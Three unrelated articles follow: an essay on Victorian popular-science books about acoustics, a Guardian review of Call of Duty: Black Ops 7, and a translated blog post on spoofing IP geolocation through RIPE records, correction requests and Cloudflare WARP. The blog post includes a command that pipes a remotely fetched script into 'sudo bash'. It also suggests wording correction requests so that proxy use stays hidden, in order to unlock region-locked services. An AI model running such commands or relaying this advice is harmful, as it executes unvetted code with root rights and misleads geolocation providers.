Here at last was clear proof that sound was not produced by generating tiny particles of matter within air, as the dominant theorists of the seventeenth and eighteenth centuries had insisted, but was instead the result of vibrations from waves. While earlier claims about the wave-like properties of sound (which in fact date back to Aristotle’s Physics ) had fallen mostly on deaf ears, Chladni’s experiment provided undeniable evidence that sound was caused by waves that could move through both air and matter.

Chladni’s ingenious demonstration also showed that sound could be observed in a variety of new ways, and would no longer be consigned to the invisible aether. Moreover, it was an easy experiment to replicate for anyone who could get their hands on a copper plate, a violin bow, and some sand. In fact, it was so widely reproduced that, in 1901, Annie Besant and Charles Leadbetter, in their wonderful (and completely bizarre) theosophical study Thought-Forms , could write that Chladni figures were “already familiar to every student of acoustics”, being “continually reproduced in every physical laboratory”. 2

Scientific diagram labeled Tab. I showing twelve numbered circles displaying various geometric patterns of lines and shaded regions, with lettered reference points around their circumferences. Scroll through the whole page to download all images before printing.

Diagram of Chladni’s figures from Entdeckungen über die Theorie des Klanges (Discoveries in the theory of sound, 1787) — Source .

Hand using a bow to play a flat metal plate mounted on a stand while another hand touches the plate's surface, demonstrating acoustic vibration experiment labeled Fig. 64. Scroll through the whole page to download all images before printing.

Illustration of Chladni’s technique for producing his figures, from John Tyndall’s Sound (1869) — Source .

The students of acoustics Besant and Leadbetter had in mind were educated through a vast collection of primers, textbooks, and popular introductions to science that were widely read across the nineteenth century. Despite being little known today, such texts were part of an important wave of science popularization, whose authors, according to the historian Bernard Lightman, “saw themselves as providing both entertainment and instruction to their readers”. 3 Written for a growing middle-class audience, such books and periodicals gave detailed descriptions of groundbreaking experiments, encouraging readers to imagine their own homes as sites of scientific discovery and playful experimentation. Genuine learning and rich enjoyment, these books proclaimed, could be had within the home, and any reader with patience, curiosity, and some basic equipment could follow along with the latest scientific revelations.

In fact, even children could do so, and the experiments in these books were democratically pitched to the whole family. Although they ranged over many scientific disciplines — including chemistry, optics, physics, magnetism, and astronomy — it is their presentation of the emerging subfield of acoustics that is particularly intriguing, since it reveals many facets of nineteenth-century culture. These books speak to a widespread amateur fascination with science and reveal a desire to initiate even the very young into a world of intellectual discovery and delight. In doing so, they set forth a new model of learning — based on play, beauty, and pleasure — that anticipates many later approaches to education. These popularizing books also offer a vision of science that has now largely been forgotten. While, in our own time, scientific understanding is usually thought of in terms of detachment and objectivity, here beauty and knowledge were often intertwined. Finally, and perhaps most unexpectedly, these books prompted readers to reflect on questions of spirituality and transcendence, since they positioned the science of acoustics as a fresh avenue for moving beyond the material plane.

Circular engraving labeled Fig. 138 showing concentric wave patterns radiating from a central point, with interference patterns across the surface. Scroll through the whole page to download all images before printing.

A figure copied from Ernst Heinrich Weber and Wilhelm Eduard Weber’s Wellenlehre auf Experimente gegründet (Wave theory based on experiments, 1825) demonstrating “the chasing produced by water-waves in a circular vessel”, from John Tyndall’s Sound (1869) — Source .

The Century of Sound

These sonic experiments reflected new listening practices and new theories of sound that unfolded across the nineteenth century. It is a century that has been described by the literary critic John Picker as the “auscultative age”, extending the term that René Laennec coined for the invention of his stethoscope to describe the Victorians’ “careful listening to a world at large — and in flux”. 4 The century also saw the birth of technologies designed to amplify, transmit, and record sound — the self-performing player piano, the phonograph, telephone, and radio, for instance. Of all the senses that the Victorians cultivated, it was the sense of hearing that experienced the most dramatic transformation. The Victorians, according to Jonathan Sterne, underwent what he terms “ensoniment”: an acoustic Enlightenment. 5

Part of this transformation included a new understanding of children’s sensitivity to sound. In his 1878 essay “Child’s Play”, Robert Louis Stevenson argued that children’s hearing is far more acute and developed than their other senses. He suggests that while children “have no great faculty for looking” (since “they do not use their eyes for the pleasure of using them, but for by-ends of their own”) and have a “sense of touch” that is not “so clean and poignant . . . as it is in a man”, both their hearing and their sense of smell are superior and “more developed” to that of their elders. But Stevenson was also convinced that the child’s naturally superior hearing could be further cultivated. For all the freshness of sound to a child, he wrote, “hearing is capable of vast improvement as a means of pleasure; and there is all the world between gaping wonderment at the jargon of birds, and the emotion with which a man listens to articulate music.” 6 The writers of these popular books of science for children may well have shared Stevenson’s conviction: they, too, wanted to educate the ears and minds of young readers, allowing them to experience and understand sound with greater precision and sensitivity.

Educational poster titled Acoustics showing numbered illustrations including sound wave diagrams, ear anatomy, musical instruments, echo demonstration with landscape, and people demonstrating sound transmission and reception. Scroll through the whole page to download all images before printing.

Coloured engraving of acoustical illustrations by John Emslie, from James Reynolds’ Illustrations of Natural Philosophy (1850) — Source .

Middle-class families of this era often read aloud to one another from novels, poetry collections, newspapers, and periodicals — that is, even printed texts were very often experienced sonically, suggesting yet another everyday aspect of Victorian listening. But the long evenings of the pre-electric nineteenth century also allowed ample time for other pursuits, including amateur science. The authors of these books stressed that their experiments could be carried out by the entire family, and even the smallest children need not miss out on the fun.

Playful Discovery

And there was indeed fun to be had. Clearly, part of the appeal of these experiments was in their sheer entertainment value. These books often use the language of “scientific amusements”, “scientific recreations”, and even scientific “parlour magic” to stress how diverting and delightful science could be. A young child might easily create intricate “acoustic curves” with the help of a basic pendulum, or construct a small siren that allowed for instructive observations on differences in pitch. The books contained advice for finding and listening to various kinds of harmonics, vibrating cords, and for observing sounds being reflected by small flames. Even a very simple experiment, such as swinging a whistle around on a string at various speeds, could yield valuable knowledge about vibration and frequency.

Green cloth book cover titled The Fairy-Land of Science decorated with gold and dark green stamped illustrations of fairy figures, flowering plants, and a child observing scientific phenomena. Scroll through the whole page to download all images before printing.

Cover of Arabella Burton Buckley’s The Fairy-Land of Science (1883), a collection of ten scientific lectures delivered to children in 1878 — Source .

Green cloth book cover of The Boy's Play-Book of Science decorated with gold stamping showing a hot air balloon at top and a boy with will-o-the-wisp at bottom, with ornate spine listing 470 illustrations. Scroll through the whole page to download all images before printing.

Cover and spine of John Henry Pepper’s The Boy’s Playbook of Science (ca. 1880 edition), featuring aeronauts and will-o'-the-wisp — Source .

Arabella Buckley’s whimsical Fairy-Land of Science (1879), for instance, encourages children to experiment with all manner of scientific principles, and her chapter “The Voices of Nature and How We Hear Them” included details of many intriguing sonic demonstrations. At one point, she instructs her readers to “take a poker and tie a piece of string to it, and holding the ends of the string to your ears, strike the poker against the fender.” 7 After noting the way the sound travelled through the string, she then invites children to hold the string in their teeth and block their ears, demonstrating the power of bone to conduct sound waves in a simple — but surely unforgettable — experiment. Elsewhere, she explains how birds produce such complexly beautiful trills and calls, and explores other miracles of the natural world. Like many popular science writers of the era, she encourages her young readers to poke around in their own ear to investigate its features: “Put your finger round your ear and feel how the gristly part is curved towards the front of your head”, Buckley writes. “This concha makes a curve much like the curve a deaf man makes with his hand behind his ear to catch the sound.” 8 By following her lead, anyone could acquire anatomical as well as acoustic knowledge.

Written in the same spirit of playful discovery, John Henry Pepper’s The Boys’ Playbook of Science (1860) and Scientific Amusements for Young People (1861) offer countless experiments and demonstrations of acoustic principles, as does Light Science for Leisure Hours (1871) by Richard Proctor. Other books, such as William Henry Stone’s Elementary Lessons on Sound (1879), Worthington Hooker’s Science for the School and Family (1863), and Rodolphe Radau’s Wonders of Acoustics (1870) emphasize sonic curiosities from history and the natural world, such as the ancient Horn of Alexander (which could reportedly be heard at a distance of many miles) and the complex interaction of echoes with rock formations. Many of these popular science books include detailed illustrations ( The Boys’ Playbook , for instance, boasted of 470 engravings) showing either disembodied hands or well-dressed Victorian youths carrying out different experiments. 9

Engraving labeled Fig. 23 showing a person standing beneath a tripod structure from which hangs a large curved horn, titled The Horn of Alexander. Scroll through the whole page to download all images before printing.

Illustration of The Horn of Alexander, which supposedly allowed the king to summon his soldiers from a distance of ten or more miles, from Rodolphe Radau’s Wonders of Acoustics (1870), revised in English by Robert Ball — Source .

Two hands near three lit candles of varying heights mounted on bases, labeled A, B, and C, demonstrating an acoustic experiment in Fig. 33. Scroll through the whole page to download all images before printing.

Demonstration of the interference of sonorous vibrations, from Alfred Marshall Mayer’s Sound (1879) — Source .

Line drawing showing a hand holding a toy head inside a glass jar, captioned as Fig. 114 demonstrating a squeaking toy used in hydrogen. Scroll through the whole page to download all images before printing.

Illustration of “the squeaking toy” used in a jar of hydrogen, from John Henry Pepper’s The Boy’s Playbook of Science (1881 edition) — Source .

Five boys labeled A through E standing in a line, each with hands on the shoulders of the person in front, with the frontmost boy bending at the waist. Scroll through the whole page to download all images before printing.

Illustration of a practical demonstration for the transmission of sound, from John Tyndall’s Sound (1869) — Source .

Luminous Flowers and Talking Machines

One of the most compelling of all the nineteenth-century books that popularized acoustics is Alfred Marshall Mayer’s Sound: A Series of Simple, Entertaining, and Inexpensive Experiments in the Phenomena of Sound, for the Use of Students of Every Age , from 1879. A professor of physics at the Stevens Institute of Technology in New Jersey, Mayer made important contributions to astronomy, optics, and acoustics, and wrote several books for the public that translated important scientific discoveries into language that any interested observer could follow. Like many other popular science writers before him, he was careful to centre his book (as its subtitle suggests) around “simple, entertaining, and inexpensive experiments”. Mayer tells his young readers that for the relatively low outlay of “just $27.50” (around £670 or $894 in today’s currency), they, too, can have a working laboratory for the investigation of acoustics, with the capacity not merely to replicate the demonstrations described in Sound , but to invent instructive experiments of their own.

Mayer patiently introduces children to many of the cutting-edge principles and theories of sound that were circulating in the late nineteenth century, covering topics such as reflection, transmission, vibration, and velocity, along with many newly discovered techniques for rendering sound visible, among them the ubiquitous Chladni figures. But in addition to imparting scientific knowledge, it is striking to note how many of these demonstrations are described in aesthetic terms, as being “beautiful”, “lovely”, or “harmonious”. Mayer clearly perceived both aesthetic and intellectual value in his experiments, and he encouraged his young readers to do the same. After one involving a pendulum that registered the vibrations of different musical intervals, for instance, Mayer advised them to frame the curves produced by the pendulum by fixing them onto glass, which will both “make beautiful ornaments for the window or mantel, and will remind you that you are becoming an experimenter”. Another “very beautiful and striking experiment” involved sprinkling silica powder into a wooden whistle, while elsewhere he describes the pleasure of discovering “beautiful little luminous flowers, like forget-me-nots” that are produced by a singing cone piped directly into a König’s flame. 10 While science in the twenty-first century is often regarded as a dispassionate and purely rational endeavour, in these books beauty and scientific knowledge go hand in hand.

Scientific diagram labeled Fig. 51 showing acoustic experiment apparatus with flame, funnel, and flexible tubes with two detailed box diagrams labeled A and B. Scroll through the whole page to download all images before printing.

Illustration of “König’s Vibrating Flame”, from Alfred Marshall Mayer’s Sound (1879) — Source .

Five horizontal strips numbered 52 through 56 showing wave patterns with flame-like shapes of varying frequencies and amplitudes against dark backgrounds. Scroll through the whole page to download all images before printing.

Illustrations of the vibrations of a flame when effected by different frequencies of vibration (produced by singing vowels at different pitches), from Alfred Marshall Mayer’s Sound (1879) — Source .

It is hard to know what age group Mayer imagined himself to be addressing. Some of the simpler experiments could be carried out by young children (perhaps with adult supervision), such as the construction of a so-called “talking machine” from an orange with a peanut nose, black bean eyes, and completed (in a slightly unsettling touch) with a “baby’s cap”. By puffing air through a small tube, and carefully controlling the “mouth” aperture, a highly realistic imitation of a baby’s “ Mama! ” could be achieved. (The accompanying line drawing bears an uncanny resemblance to Sesame Street ’s Grover.) Others are considerably more complex, and would surely require the dexterity and understanding of a teenager. (Several of the illustrations feature a youth of somewhere between ten and fifteen years, neatly dressed in a blazer, tie, and striped trousers.) It must be said, too, that many of Mayer’s experiments and demonstrations are highly dangerous. Bunsen burners, heliostats, gas flames of various kinds, fragile glass tubes, and even volatile substances like lycopodium and silica powder are commonly used.

Engraved illustration labeled Fig. 59 showing a spherical toy with bonnet and features dressed in ruffled collar, with text ‘MA MA’ appearing near its mouth. Scroll through the whole page to download all images before printing.

Illustration of a talking machine fashioned from an orange with thick skin, from Alfred Marshall Mayer’s Sound (1879) — Source .

Boy in formal attire holding flexible tube connected to acoustic apparatus with vertical rods and box-like resonator mounted on pedestal. Scroll through the whole page to download all images before printing.

Experiment showing how vibrations are transmitted and reflected, from Alfred Marshall Mayer’s Sound (1879) — Source .

Mayer’s introduction to acoustics is representative of many of the books in this genre, especially in its palpable enthusiasm for scientific discovery. The experiments in all of these popular science books on sound are often pitched to the reader as delightful diversions — entertaining escapes from daily life. Yet as delightful as such experiments were, many of the authors also went to great lengths to stress their educational value. Amateur experimenters were not just acquiring sophisticated party tricks for the sake of amusement, but were also gaining genuine knowledge of acoustic principles. Playing around with different kinds of pendulums, for instance, may well be enjoyable in and of itself, but was also imparting knowledge about sound waves. In the same way, clapping near small flames revealed important principles of sonic reflection, while using whistles and “lamp chimneys” instructed young scientists about the effects of vibrating columns of air. Here in these books was a new vision of what education might be — real knowledge, the authors insisted, might arise naturally from play. Simply by encouraging their natural curiosity, children could be gently nudged in the direction of scientific discovery. To read these books even today is to recapture a childlike thrill in the process of learning.

Such pedagogical principles were far from the norm during the nineteenth century, which largely took a joyless, authoritarian approach to educating the young. The Victorian vision of institutional education was characterized by “harsh and coercive lessons”, writes Elizabeth Gargano, centred on “rote recitations and enforced silence.” 11 Many popular science books of this era stand in stark contrast to such principles, offering a very different vision of education that is based on a harmony between play and learning. Instead of the austere silences of institutional education, such books are alive with sound and show readers precisely how to produce unusual acoustic phenomena. During the early years of the twentieth century, such a vision would be central to many new and radical approaches to educating children, including those of Maria Montessori, Rudolf Steiner, and the Reggio Emilia community. Joy, play, tactile discovery, and self-directed learning were at the heart of such novel ways of learning. The popular scientific books for children that were so successful in the nineteenth century may well have anticipated these later advances in educational theory and practice.

Group portrait of students seated on wooden carts and standing against brick wall, with caption about constructive play and manual training. Scroll through the whole page to download all images before printing.

Photograph demonstrating the “cultivation of the Constructive-Play interest”, which leaves no room for “the Destructive-Play tendencies”, from William S. Marten’s Manual Training – Play Problems (1917) — Source .

On the Sonic Plane

It is clear that these scientific instructionals reveal much about Victorian attitudes to science, children, entertainment, and learning. But there is another intriguing dimension to these forgotten texts: their insistence that sound itself, when properly understood, can allow for mysterious experiences of transcendence and spiritual communion. Many of these authors understood hearing as an inherently spiritual sense, an intuition that animated many other reverential and quasi-mystical conceptions of sound that were advanced across the nineteenth century. They stressed the “mysterious” and “angelic” properties of sound waves, telling young readers of the unearthly ways in which they interact with the human ear. It is no accident that several books (such as Buckley’s) invoke a realm of fairies and magic, and encourage new ways of perceiving and attending to the sensory world.

For many scientific writers, sound itself was part of a divine, ethereal realm that had only recently, through experimental science, drawn slightly closer. Something about sound itself readily moved the Victorian mind in a spiritual direction. Whether the grains of sand in Chladni’s experiment that seemed to be moved by unseen hands, or the mysterious forces that seemed to be channeled in other demonstrations, sound itself stood in for powerful forces of other kinds. Now that sound could be seen, perhaps other once-invisible energies might also reveal themselves. It is not too much of a leap from thinking about the effect of sound waves on matter to that of spirit on matter. In this way, the newly discovered visibility of sound in the Victorian age has obvious parallels with the Christian doctrine of the Incarnation: here, too, albeit on a far smaller and more manageable scale, a once-distant and invisible force was given physical form. The fact that spiritualism and theosophy were first becoming popular and widely practiced during this period also testifies to a broader interest in the ethereal realm. And since many artistic practices and new technologies were quickly pressed into the service of exploring such a realm, it is no surprise that science was too.

Painting showing abstract multicolored form with swirling patterns and geometric shapes hovering above landscape with cathedral, transitioning from yellow center through darker outer edges Scroll through the whole page to download all images before printing.

“Music of Gounod”, from Annie Besant and Charles Leadbeater’s Thought-Forms (1901) — Source .

Painting showing Gothic cathedral in landscape with large abstract form above featuring concentric outlined layers, geometric patterns, and gradient coloring from cream center to brown edges. Scroll through the whole page to download all images before printing.

“Music of Mendelssohn”, from Annie Besant and Charles Leadbeater’s Thought-Forms (1901) — Source .

Line drawing labeled Fig. 24 The Invisible Woman showing apparatus with latticed enclosure containing speaking tubes and woman standing beside wall-mounted listening tube. Scroll through the whole page to download all images before printing.

“The Invisible Woman”, from Rodolphe Radau’s Wonders of Acoustics (1870) — Source .

The newly discovered materiality of sound prompted many strange claims about its spiritual power: in 1837, Charles Babbage famously declared that “The air itself is one vast library on whose pages are forever written all that man has ever said or woman whispered” — a cosmic vision of all speech and sound as being potentially retrievable. The Victorians speculated that modern acoustic science might well be bringing lost or once-hidden realms nearer, such that we might someday be able to hear “the grass grow and the squirrel’s heart beat”, as the narrator of George Eliot’s Middlemarch (1872) imagines. 12 It is telling, too, that the authors of popular books on acoustics often wrote with an air of initiating the young into a world of profound mystery, as though imparting great and secret knowledge. In Sound and Music (1879), the Reverend J. A. Zahm even included a poem that stresses the spiritual significance of sound, writing of God’s voice at the moment of creation moving through “soundless realms of space” and setting in motion a world that is now “vibrant”, containing shadowy whispers of “choral raptures grand” that resound in the heavens. 13 For Zahm at least, exploring sound was a project of spiritual significance, promising illumination far beyond mere scientific knowledge.

Amateur Enthusiasms

Nowadays, the term “pop-science” is often used disapprovingly, as though something important is always lost when genuine scientific research is translated into less nuanced terms that the public can comprehend. But the hard distinction between professional and amateur science in our own era — between expertise and general interest — was not yet fully present in the nineteenth century.

To read these surprising, delightful, and often beautiful popular science books is to be made aware of the enormous gulf that has opened up between professional scientists and the public. As science became increasingly specialized in the twentieth century, the public were no longer able to follow along with new findings, let alone have any hope of reproducing important experiments. It is difficult to imagine an amateur enthusiast recreating the latest research, regarding the quantum phenomena of sound, for example, or the way that spiders “listen” to their surroundings via vibrations in their webs, at home. Of course, contemporary publishers still put out science primers, textbooks, and explainers, but something vital has vanished. The frontier of scientific discovery has receded from view, moving far beyond what non-specialists can comprehend. These nineteenth-century popularizing books arose during a brief period in which even children could somewhat keep pace with scientific advancement. They offer a crucial window into what has been lost, and reveal how new understandings of sound filtered through Victorian culture and beyond.

The text of this essay is published under a CC BY-SA license, see here for details.

Call of Duty: Black Ops 7 review – hallucinogenic romp through dystopia is stupidly pleasurable

Guardian
www.theguardian.com
2025-11-14 06:00:20
Activision; PlayStation 4/5, Xbox, PCWith a deafening onslaught of massive shootout set-pieces in exotic locations, an evolving campaign mode and excellent multiplayer offerings, this maximalist instalment of crazed carnage is a hoot It seems like an anachronism now, in this age of live service “for...
Original Article

I t seems like an anachronism now, in this age of live service “ forever games ”, that the annual release of a new Call of Duty title is still considered a major event. But here is Black Ops 7, a year after its direct predecessor , and another breathless bombard of military shooting action. This time it is set in a dystopian 2035 where a global arms manufacturer named the Guild claims to be the only answer to an apocalyptic new terrorist threat – but are things as clearcut as they seem?

The answer, of course, is a loudly yelled “noooo!” Black Ops is the paranoid, conspiracy-obsessed cousin to the Modern Warfare strand of Call of Duty games, a series inspired by 70s thrillers such as The Parallax View and The China Syndrome, and infused with ’Nam era concerns about rogue CIA agents and bizarre psy-ops. The campaign mode, which represents just a quarter of the offering this year, is a hallucinogenic romp through socio-political talking points such as psychopathic corporations, hybrid warfare, robotics and tech oligarchies. The result is a deafening onslaught of massive shootout set-pieces in exotic locations, as the four lead characters – members of a supercharged spec-ops outfit – are exposed to a psychotropic drug that makes them relive their worst nightmares. Luckily, they do so with advanced weaponry, cool gadgets and enough buddy banter to destabilise a medium-sized rogue nation. It is chaotic, relentless and stupidly pleasurable, especially if you play in co-operative mode with three equally irresponsible pals.

In an interesting move, the campaign closes with a new mode, Endgame. It’s a co-op PVE (player v environment) offering inspired by the endgame content of MMO (massively multiplayer online) games such as World of Warcraft, where it’s usually designed to keep people playing even after they’ve levelled up to the max. In the Call of Duty version, groups of players touch down in the fictitious city of Avalon and undertake missions and objectives, such as taking down high value enemies or safely escorting expensive military tech, all within a vast open environment. Along the way, you upgrade your characters and weapons, and publisher Activision says new missions and objectives will be added, likely including public events where different teams can combine forces to take on mega bosses. Time will tell, but for now, it’s a nice way to extend the campaign and prepare us for online play.

Soldiers standing on a city rooftop while drones fly overhead in a screenshot for video game Call of Duty: Black Ops 7.
Future warfare … Call of Duty: Black Ops 7. Photograph: Activision

Because make no mistake, the heart of the game is the traditional multiplayer, which brings fresh modes, guns and gadgets to the standard Call of Duty experience: 12 players in a small location pulverising each other in operettas of mechanised slaughter. New maps such as those set in a Tokyo-inspired shopping district and a deep sea rig are efficiently designed chambers of death, with alleyways, high-up windows and open squares to direct players towards one another with vicious style and intent. My favourite is the Alaska base map Imprint, where a moving platform makes taking objective points in the Domination and Hardpoint modes incredibly messy and disorientating. A new wall jumping ability has opened up the verticality of the locations, allowing players to find new routes around the complex architecture. If you’ve never been into the turbocharged twitchcore savagery of the Call of Duty online experience, this isn’t going to change your mind, but there’s a lot here to enjoy for perennial conscripts of carnage.

Then you have the Zombies mode, another online co-op offering, taking place in a vast nightmarish hellzone of abandoned frontier towns and irradiated wastelands. Here, players take on wave after wave of zombie monsters while upgrading their weapons and abilities in order to hold out as long as possible. It’s a return to the round-based structure of previous Zombies entries, with lots of new weapons and features, including the ability to drive from area to area in a pickup truck while blasting rampaging monsters off the bonnet. It feels like taking part in some sort of crazed theme park ride, and again, a real hoot with a bunch of likeminded pals.

Additionally, there’s Dead Ops Arcade 4, a self-contained top down twin-stick shooter for up to four players. This extra was born as a side project by members of the original Black Ops team, and hidden within the main game. Now it’s back and it’s a blast in its own right, reminding old school fans of multi-directional shooters such as Smash TV and Geometry Wars ; there are even little playable mini-games between stages which take in genres such as top down racers and horizontal scrolling shoot-’em-ups – so grandad can play too!

Add in the usual refresh to battle royale mode Warzone and you have an exhaustive package for Call of Duty fans. Whatever you think about the series and its problematic role in how the mainstream games industry works, how it is perceived and the types of communities it engenders, this is slick, thrilling entertainment. Nowhere else will you be blasting a giant robot in a corporate science lab one minute, and then playing a modern take on Atari’s Super Sprint the next. Value matters right now, and in this as in almost everything else, Call of Duty does not hold back. It is a maximalist paean to the ultimate, troubling truth of video game design – shooting stuff on a TV screen is a hell of a lot of fun.

  • Call of Duty: Black Ops is out now; from £69.99

How to Get a North Korea / Antarctica VPS

Lobsters
blog.lyc8503.net
2025-11-14 05:23:04
Comments...
Original Article

This article is currently an experimental machine translation and may contain errors. If anything is unclear, please refer to the original Chinese version. I am continuously working to improve the translation.

Introduction

This blog post should be the final part of the “Running Your Own ISP at Home” series, and we’re going to talk about how to modify the geolocation of the IP addresses we announce.

By tweaking IP geolocation, you can:

  • Display absurd IP locations on various platforms — for example, Antarctica (which barely has internet infrastructure), North Korea (which isn’t connected to the global internet), or some obscure tiny country with only tens of thousands of people
  • Use a single VPS to obtain IP addresses from all over the world, show off on probe networks and achieve a weird kind of “All In One” status (yep, even this is All In One now)
  • Unlock region-locked streaming services — see this hostloc thread
  • Run a one-man IDC selling VPSes from all corners of the globe — I found one called GlobalVM, but haven’t tried it, so no recommendation. Feel free to search on your own.

This article will mainly focus on modifying IP geolocation and using WARP to get a corresponding-region IPv4 address. Unlocking streaming content and running an IDC won’t be covered in depth — refer to the link above if interested.

Prerequisites

This is probably common knowledge for many, but for completeness, let’s go over it briefly.

IP Databases

IP database providers compile mappings from IP → geographical location using methods like network scanning and WHOIS lookups. They also include data such as IP threat scores and type (residential, server, or VPN). These databases are sold to users — typically websites — which then query them in the backend to display location info and perform risk assessment. A handy tool for querying multiple geolocation databases at once: https://iplark.com/

Popular IP databases include Maxmind, IPInfo, and DB-IP. Smaller databases often sync data from larger ones.

WARP

WARP is a WireGuard-based VPN service provided by Cloudflare. While they offer an official Linux client, most people use native WireGuard to connect. WARP can provide your server with both IPv4 and IPv6 addresses, commonly used to add IPv4 connectivity to IPv6-only VPSes (or vice versa). One key feature of WARP is that the public IP it assigns will have the same geolocation as the IP you’re connecting from — we’ll use this property later. For a detailed WARP setup guide, check out: https://p3terx.com/archives/use-cloudflare-warp-to-add-extra-ipv4-or-ipv6-network-support-to-vps-servers-for-free.html

Submitting Geolocation Correction Requests

In reality, the “location” of an IP is inherently fuzzy. For instance, my 2a14:7c0:4d00::/40 block was originally allocated to Israel. But later, I bought parts of this range and announced them via BGP in Germany, the US, and Singapore (see previous article on Anycast networks ). Meanwhile, I’m physically located in mainland China. As the owner of this IP block, I can also freely edit the country field in the WHOIS database — and I set it to KP (North Korea).

Because of this ambiguity, it’s nearly impossible to precisely determine an IP’s location using any single technical method. As a result, almost all geolocation databases accept public/user-submitted correction requests.

Preparation

Before submitting any requests, let’s do a little prep work.

IP databases collect IP ranges from global routing tables. Previously, we were announcing the entire 2a14:7c0:4d00::/40 block without subdividing it in RIPE NCC, which makes it harder for databases to process smaller segments. So let’s fix that.

Log in to the RIPE Database, go to My Resources → IPv6 → Create assignment , and fill out the form to create a new inet6num (which represents an IPv6 address block):

  • inet6num : Enter a subnet. The smallest allowed is /48 , so I entered 2a14:7c0:4d00::/48 . If you only own a /48 , you can’t subdivide further — you can only edit the LIR-assigned block.
  • netname : Pick a name you like
  • country : Choose the country/region you want this IP block to appear in
  • admin-c & tech-c : Fill in two contact objects — use the ones you created earlier
  • status : Select ASSIGNED to indicate it’s assigned

Form for creating a new inet6num Form for creating a new inet6num

After creation, you can see all your subnets under “My Resources”:

Viewing subnets under the LIR-assigned block Viewing subnets under the LIR-assigned block

Next, update the BIRD configuration from our previous article , changing 2a14:7c0:4d00::/40 to 2a14:7c0:4d00::/48 , then restart BIRD.

After some time, use BGP Tools to verify that 2a14:7c0:4d00::/48 is now visible. The old /40 page should return 404.

Submitting Correction Requests

You can submit geolocation correction requests to common IP databases: Maxmind , IPInfo , Google

If asked for justification, write something like “Due to incorrect IP geolocation, I/my clients cannot access region-restricted websites” (in English). Avoid mentioning use for anonymous proxies — that might violate their correction policies.

Each database has its own review process. Some involve manual checks, and changes usually take 3 days to 2 weeks to go live. Most offer online lookup tools (like Maxmind’s Demo ) — you can use them to check progress, or use IPLark for batch queries.

In my test, IPInfo accepted my request within a week. Maxmind didn’t respond after two weeks, so I followed up via their contact form , and they finally approved it. (Wait a bit first — only reach out after multiple failed submissions.)

(p.s. Recently, Maxmind has been rejecting requests to set location to Antarctica (AQ) — probably too many people trying to go there . That’s why this article uses North Korea as an example. If you really want an Antarctica IP, try the geofeed method at the end to bypass manual review.)

Below is for reference only — feel free to make up craft your own justification:

Q: Hello, I am the network operator and owner of AS214775. I found out that my IP address segment 2a14:7c0:4d00::/40 is incorrectly localized to Israel, causing me to be denied access to other websites. I have tried several times to submit data corrections using the data correction form, but no response. I have corrected the country of my IP segment in the RIPE NCC database, and some other databases such as ipinfo.io have been synchronized, but Maxmind keeps locating my IP segment to Israel. I would like to politely ask why MaxMind has not responded to my correction request?

A: Thank you for your email. This will be updated in Tuesday’s release of the database.

Using WARP to Get a Region-Matched IPv4

Cloudflare uses Maxmind’s database, so as long as Maxmind reflects your desired location, WARP will follow suit. Note that Cloudflare may lag behind Maxmind by 1–2 weeks. If Maxmind shows the correct location but Cloudflare hasn’t updated, just wait a little longer.

WARP assigns IPv4 (and IPv6) addresses based on your connection IP’s geolocation. The IPv4 address not only allows access to IPv4-only sites, but its geolocation is maintained by Cloudflare — highly accurate and consistent across databases, much more reliable than manually submitting corrections everywhere.

We’ve already introduced WARP, so let’s jump straight into setup using this guide :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

curl -fsSL git.io/wgcf.sh | sudo bash
wgcf register
wgcf generate

vim wgcf-profile.conf










ip -6 route add <WARP_server_IP>/128 via <IPv6_gateway> dev eth0 src <your_AS's_IPv6_address>
# Example: ip -6 route add 2606:4700:d0::a29f:c001/128 via 2a03:d9c0:2000::5 dev eth0 src 2a14:7c0:4d00::1

cp wgcf-profile.conf /etc/wireguard/warp.conf
wg-quick up warp

Now test your VPS’s IPv4 geolocation using Cloudflare’s /cdn-cgi/trace endpoint (available on any site behind CF). ip=104.28.212.208 means we got that IP, colo=DUS means we’re connecting via the DUS (Düsseldorf Airport) data center ( IATA code ), loc=IL means geolocation is IL (Israel) ( country code ), and warp=on confirms WARP is active:

We did successfully change our location, but loc=IL means Cloudflare hasn’t picked up Maxmind’s update yet — let’s wait a bit longer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@s39230 ~ 
fl=910f1
h=www.cloudflare.com
ip=104.28.212.208
ts=1731586511.237
visit_scheme=https
uag=curl/7.88.1
colo=DUS
sliver=none
http=http/2
loc=IL
tls=TLSv1.3
sni=plaintext
warp=on
gateway=off
rbi=off
kex=X25519


root@s39230 ~
{"code":0,"msg":"","message":"","data":{"addr":"104.28.212.210","country":"Israel","province":"Jerusalem District","city":"Jerusalem","isp":"cloudflare.com","latitude":"31.768319","longitude":"35.21371"}}

After nearly ten real-world days, Cloudflare WARP finally updated its database! Even slower than Cloudflare’s other services… At this point, it had been about two weeks since Maxmind updated, and a full month since my first correction request — almost missed the deadline before my server expired (thankfully, it didn’t).

Retest, and now we see the new IP 104.28.197.243 returns loc=KP , and Bilibili’s API shows North Korea:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@s39230 ~ 
fl=48f122
h=www.cloudflare.com
ip=104.28.197.243
ts=1732203935.881
visit_scheme=https
uag=curl/7.88.1
colo=DUS
sliver=none
http=http/2
loc=KP
tls=TLSv1.3
sni=plaintext
warp=on
gateway=off
rbi=off
kex=X25519

root@s39230 ~
{"code":0,"msg":"","message":"","data":{"addr":"104.28.197.248","country":"North Korea","province":"Pyongyang","city":"","isp":"cloudflare.com","latitude":"39.073798","longitude":"125.819764"}}

Let’s check our own IPv6 and WARP-assigned IPv4 using IPLark:

Our IPv6 is only recognized as North Korea by Maxmind — others think it’s Antarctica or Germany — all over the place (but 80% of sites rely on Maxmind anyway) Our IPv6 is only recognized as North Korea by Maxmind — others think it’s Antarctica or Germany — all over the place (but 80% of sites rely on Maxmind anyway)

WARP-assigned IPv4 is consistently shown as North Korea WARP-assigned IPv4 is consistently shown as North Korea

Now just set up a proxy on this VPS, and you can proudly flaunt your North Korean IP across the web. (If you’ve read this far, I assume you know how to set up a proxy.)

Final proof: a real Bilibili comment screenshot 🤣 Final proof: a real Bilibili comment screenshot 🤣

Optional: Geofeed and Preventing Reversion

Lastly, the promised “Light Up the Globe” trick. For large providers with IPs all over the world, manually submitting corrections isn’t practical.

